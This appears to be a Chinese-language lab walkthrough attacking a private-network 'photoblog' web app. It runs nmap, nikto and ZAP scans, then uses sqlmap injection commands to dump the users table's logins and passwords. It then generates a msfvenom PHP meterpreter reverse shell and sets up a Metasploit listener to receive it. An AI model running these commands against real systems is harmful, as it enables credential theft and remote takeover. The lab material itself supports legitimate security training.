信息探测
扫描主机服务信息以及服务版本
nmap -sV 192.168.101.50
快速扫描全部信息
nmap -T4 -A -v 192.168.101.50
扫描敏感信息
nikto -host http://192.168.101.50:80
深入挖掘
分析nmap、nikto扫描结果,并对结果进行分析
使用浏览器打开http://192.168.101.50:80
漏洞扫描
使用web漏洞扫描器owasp-zap(ZAP)
打开之后选择Automated Scan,然后输入目标ip开始进行攻击,等待GET信息返回完毕
然后查看是否可以进行sql注入
使用sqlmap利用sql注入漏洞
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" 查看id是否具有sql漏洞
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -dbs 查看数据库名
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" --tables 查看对应数据库中的表
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" --columns 查看对应字段
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" -C 'login,password' --dump 查看对应字段的值
(也可以直接尝试sqlmap -u-url -os-shell直接获取shell)
得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录
生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.51 lport=4444 -f raw
gedit shellcd.php
(将生成的php代码拷贝到shellcd.php中)
上传shell反弹监听
打开msfconsole
msfconsole
启动监听模式
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lport 4444
run
文章来源地址https://uudwc.com/A/EvkL0
文章来源:https://uudwc.com/A/EvkL0